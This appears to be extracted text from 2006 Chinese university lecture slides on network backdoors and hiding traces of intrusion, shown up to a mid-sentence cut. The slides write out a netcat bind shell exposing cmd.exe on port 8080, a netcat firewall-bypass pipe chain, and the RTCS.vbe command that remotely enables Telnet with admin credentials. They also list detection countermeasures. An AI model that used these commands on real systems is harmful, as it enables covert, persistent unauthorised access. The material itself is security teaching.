计算机网络安全09.pptVIP

计算机网络安全—网络后门与网络隐身 计算机网络安全 (9) 网络后门与网络隐身 杨寿保 中国科技大学计算机系 syang@ 1/~syang 0/~shaolin/solution.htm 3601540 二○○六年三月 内容提要 为了保持对已经入侵的主机长久的控制，需要在主机上建立网络后门，以后可以直接通过后门入侵系统。 当入侵主机以后，通常入侵者的信息就被记录在主机的日志中，比如IP地址、入侵的时间以及做了哪些破坏活动等等 为了入侵的痕迹不被发现，需要隐藏或者清除入侵的痕迹 实现隐身有两种方法： 设置代理跳板 清除系统日志。 网络后门 网络后门是保持对目标主机长久控制的关键策略。可以通过建立服务端口和克隆管理员帐号来实现。 留后门的艺术 只要能不通过正常登录进入系统的途径都称之为网络后门。后门的好坏取决于被管理员发现的概率。只要是不容易被发现的后门都是好后门。留后门的原理和选间谍是一样的，让管理员看了感觉没有任何特别的。 后门技术 当攻击者一旦攻入一个系统之后，他的欲望开始膨胀 保留访问权，甚至权限升级：如果他没有管理员权限，期望得到管理员权限，或者设法得到管理员口令 他能满足于这一次的进入吗？下次怎么进来？设置一个后门，下次可以轻松进入 摧毁系统… 后门技术 后门是指攻击者再次进入网络或者系统而不被发现的通道。也就是说，攻击者可以隐蔽地进入系统而不用花费很多功夫的通道。 后门技术是系统相关的 关联技术：特洛伊木马(Trojan Horse) UNIX或Linux下的后门技术 在被攻击的机器上打开一个端口，进行监听，这样的工具如netcat，然后等待远程连接 rootkit 文件类型的rootkit，修改一些常用的命令文件，比如login, ls, who, netstat等 内核中的rootkit，内核中的后门——knark 预防措施 一些检测软件(tripwire)可以检测出被修改的文件 基于内核的IDS系统，可以对内核rootkit报警 应急处理 哪些命令该信任，哪些不该信任 Windows下的后门技术 远程执行后门程序 如果只有远程访问权限，则可以通过schedule service和at命令启动远程机器上的程序 或者修改远程机器注册表的启动程序表项 netcat也有Windows的版本 在被攻击的机器上开一个端口，然后等待连接 可以利用netcat把一个cmd.exe进程(shell)的输入输出与netcat端口联系起来，例如nc –L –d –e cmd.exe –p 8080 也可以利用端口重定向，以绕过防火墙nc target.ip 80 | cmd.exe | nc target.ip 25 Windows下的后门技术(续) 其他后门程序 “客户/服务器”模式 netbus Back Orifice …… 对策 隐藏和检测技术的较量 检查注册表中的启动表项 用netstat显示端口信息 案例-1 远程启动Telnet服务 利用主机上的Telnet服务，有管理员密码就可以登录到对方的命令行，进而操作对方的文件系统。如果Telnet服务是关闭的，就不能登录了。 默认情况下，Windows 2000 Server的Telnet是关闭的，可以在运行窗口中输入tlntadmn.exe命令启动本地Telnet服务，如图所示。 启动本地Telnet服务 在启动的DOS窗口中输入4就可以启动本地Telnet服务了。 远程开启对方的Telnet服务 利用工具RTCS.vbe可以远程开启对方的Telnet服务，使用该工具需要知道对方具有管理员权限的用户名和密码。 命令的语法是：“cscript RTCS.vbe 09 administrator 123456 1 23”， 其中cscript是操作系统自带的命令 RTCS.vbe是该工具软件脚本文件 IP地址是要启动Telnet的主机地址 administrator是用户名 123456是密码 1是登录系统的验证方式 23是Telnet开放的端口 该命令根据网络的速度，执行的时候需要一段时间。 远程开启对方的Telnet服务 确认对话框 执行完成后，对方的Telnet服务就被开启了。在DOS提示符下，登录目标主机的Telnet服务，首先输入命令“Telnet 09”，因为Telnet的用户名和密码是明文传递的，首先出现确认发送信息对话框。 登录Telnet的用户名和密码 输入字符“y”，进入Telnet的登录界面，需要输入主机的用户名和密码。 如果用户名和密码没有错误，将进入对方主机的命令行。 记录管理员口令修改过程 当入侵到对方主机并得到管理员口令以后，就可以对主机进行长久入侵了，但是一个好的管理员一般每隔半个月左右